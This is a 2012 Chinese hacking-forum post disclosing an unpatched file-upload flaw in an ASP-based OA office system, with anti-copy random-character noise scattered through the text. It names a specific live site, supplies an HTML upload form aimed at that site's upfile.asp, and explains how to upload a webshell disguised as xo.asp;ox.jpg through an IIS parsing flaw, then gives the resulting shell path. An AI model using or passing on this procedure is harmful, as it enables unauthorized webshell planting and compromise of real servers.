找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2224|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
( F; H7 D2 o! \: ^* S* v5 @2 Y
' p' e/ E7 @; k% ?& }3 G4 g系统介绍:2 ~# @8 ^9 {8 ^& Z7 n" K) k
; S' s2 k5 ^' y* c
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
6 D6 ?# W( Z# Z% j4 [2 v* c  E' m! A4 f( _% P, _5 k
主要功能:- x+ N6 K) l) C/ B
公司通告
8 R$ e% q+ y' y9 u8 c+ u$ h% h. ^, y8 c4 Y工作计划
! M" I+ l) }; D/ Z( T& |6 H通讯助理
* x$ I) P: ~7 d" L! W- ]客户资源 $ D3 E$ L0 s# x2 {3 _
我的公文 3 {, N: x! Y9 [# Q& Q0 U
公文传阅
9 m  }% u+ j% a* R9 a公共资源 " N" o+ L; `0 _6 F6 i; n; B
资源预约
; k8 W! T9 L+ Z4 G今日考勤 9 E* M. [/ }9 F$ q' _$ i4 V
个人计划
  v7 N" f/ O# d1 B: l个人通讯录 & F/ _+ T$ _9 N+ s! w* y4 _% A
个人基本档案
& d* Y+ A, a0 i' ~" E未读邮件 # l1 k2 \: _1 g( @3 ]* p
发邮件
; ]2 R+ V# @6 {  c4 I收件夹 1 a& }* T- C' K  r: I5 \
寄件夹
+ t  e+ u: ?9 k3 p网络硬盘
2 N! @# S2 X7 g' Z! z1 X0 N网络会议 7 {4 ]& T7 ?1 l) \3 I& j9 a# Q& C
网络调查
- V6 y: w+ x" w, ]! ^0 c: f7 e交流论坛
2 @: G" }7 A& x8 `$ W9 F# R# X% b! D" D! a: U* g
有兴趣测试的朋友可以下源码看看
  i( \4 t7 G1 J1 r
" g1 A+ I9 K, J* R$ x- L/ j8 H源码下载:
+ Y6 G  P0 K$ w# B/ z4 e
/ \, }1 {( q6 ?* ~/ }* H* K: yhttp://www.mycodes.net/30/4750.htm
, y% ~! g0 R( A2 X* \# A
( D) ?3 c1 C$ _' z+ E) f漏洞介绍:) f# S: t, s5 v# a1 l7 X! N1 Y
- O8 B( `. w* o  l) m. q
由upfile.asp上传文件漏洞引起2 u( A. L5 b! A$ ~  a  z% W

& S9 [, H  g+ k  I7 T% r测试方法:
8 b( U. R4 u; f2 O2 n* W6 e* m1 B+ N6 |( \; r1 y/ e
使用名小子上传http://www.itlynn.com/upfile.asp即可/ K, {& ~# Q1 z! v  U. C1 m
! U% _* v* _9 O0 M2 N
如果upfile.asp文件被删除不存在。( w4 q  ]1 I. T- Y( m8 s7 l  e( j

! a% J4 G' D# s" r; f  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
% K  K3 _* l0 {+ N, U# J) E1 [1 F1 ^: a1 V6 M" z2 j% T
如果存在那么将如下代码保存为upfile.html。
6 z4 C$ F0 p+ |7 _# D# s! f
  Q$ d. q; S$ a$ w( b然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
7 h4 x: G' \- R; T# a+ |- b/ y. X7 T/ F3 U* A) f. D& Q7 ~3 b
5 u4 ^% Q/ e8 p3 w+ I" f5 c
: P9 G4 n$ C. l3 W: h
01 <table border='0' align="center" cellpadding="5">
6 c3 `& r( |2 U
; F+ ?# I( b) C0 R% }! u02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
& {/ {9 I( O' S1 S0 J1 L9 J$ P  B, s" n" V. G; n8 T
03 <tr> % M( j* l; ]8 v# w3 F

. `5 D: r1 z' m* F04             <td>报错:</td> 6 k: s4 l+ k* D# n& d4 T6 t
( L4 Z! }3 X$ _, K7 a
05             <td><input type='radio' name='errnumber' value='0'>
6 `7 S4 `, D" X. y& y% m/ j9 y  G! Z4 b
06               自动更名
! \8 N$ D/ w8 y: e( Y: L0 P. M# t6 K( U1 P( N8 ]6 |- x* g( s+ x
07               <input type='radio' name='errnumber' value='1' checked>
/ K  Y  g  y  D/ t1 P5 w7 [/ ^
* m: e3 R2 x$ c2 u- q. q08               报错方式
- H/ U1 Y2 R) I& v2 N; x. }/ z7 I# s9 x& s) S. \  D
09               <input type='radio' name='errnumber' value='2'> * Q" c- l6 R' A  S2 S5 f
6 |: {& }8 m6 \; R. o
10               直接覆盖</td>
: \4 f- B' L- [% s- @" ~4 w" }0 O$ n
  V" h1 a& D- P; o5 K2 l11           </tr> 7 v. a4 L0 u& E3 C' D
& u5 v/ R% L. g* p2 d; ~6 |
12           <tr>
9 h7 g+ Z+ u- m
1 P1 p4 D1 X- g  r1 u' B13             <td>主题:</td>
2 L- L! z. `' t/ a7 v; T0 C7 A) ?
6 a- G3 z/ K( @; z. {2 D, G14             <td><input type='text' name='filename' size='30'></td>
  J7 [' I6 V0 Y( D& ^6 d) O, ]3 [. ~8 i) f0 A- h
15           </tr>
: C; w2 c, V4 M8 H+ r2 p* t
" ]' ]* B- Y3 S1 `16           <tr>
% a4 E7 ^0 }( ~  D* ?+ U% [* @4 a2 A3 L1 c' ^3 @9 o# |# C  G
17             <td>文件:</td>
, j% q3 ^6 |2 q' U8 G% Y& \  A0 s! `4 m) ^! W
18             <td><input type="file"name="fruit"size="30"></td> ; N- I, r4 ]) N( e2 y1 k& D
' C+ U) |0 s& s" f! f- i
19           </tr> 2 H1 i/ A0 _' B2 X
: y1 h; M5 Q/ U% w, u( K
20           <tr>
. x4 `/ [% ?4 N8 z* _! f8 k4 q, K; B0 }" ]& j  z
21             <td valign='top'>简介:</td>
$ o. f" Z9 \# H: |( z* f8 q3 T& M# X6 S2 B, x% ^# \! d3 v4 o
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% D# b* j% |8 e: e$ }8 Y
8 O& c' p* I" Y0 \23           </tr>
6 n. Y8 |$ X$ r8 R% R; b/ Q  }2 z; ~
24   
7 l# E6 j, s3 I+ [7 q6 q# Q: R6 n* T& S
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
% g2 m6 M  x' `4 R9 |' M) T1 r$ a9 |7 t# J" P! _7 }
26           </tr> ( Y  C& s- A/ {

& X) m7 G  y. y' k* P/ T4 V* F27         </form> ' a: {0 I1 X0 Q% _
6 q7 L7 p0 J( w" Q- Q# \+ |3 \
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
* s& G& n6 c0 T& j) W" d0 }, \; t; [5 [+ E2 @4 d; k& x

; Z' P! D+ d4 F8 E- c$ X! [6 ]8 z. N; M
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg( b* S6 d( }7 C2 P2 Y

: e5 j. _( |; B# B此漏洞需要配合解析漏洞利用。
5 l; Y, o6 \, ^$ J) Z. h% a, M/ P9 z7 e* P/ A1 z( W  S5 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表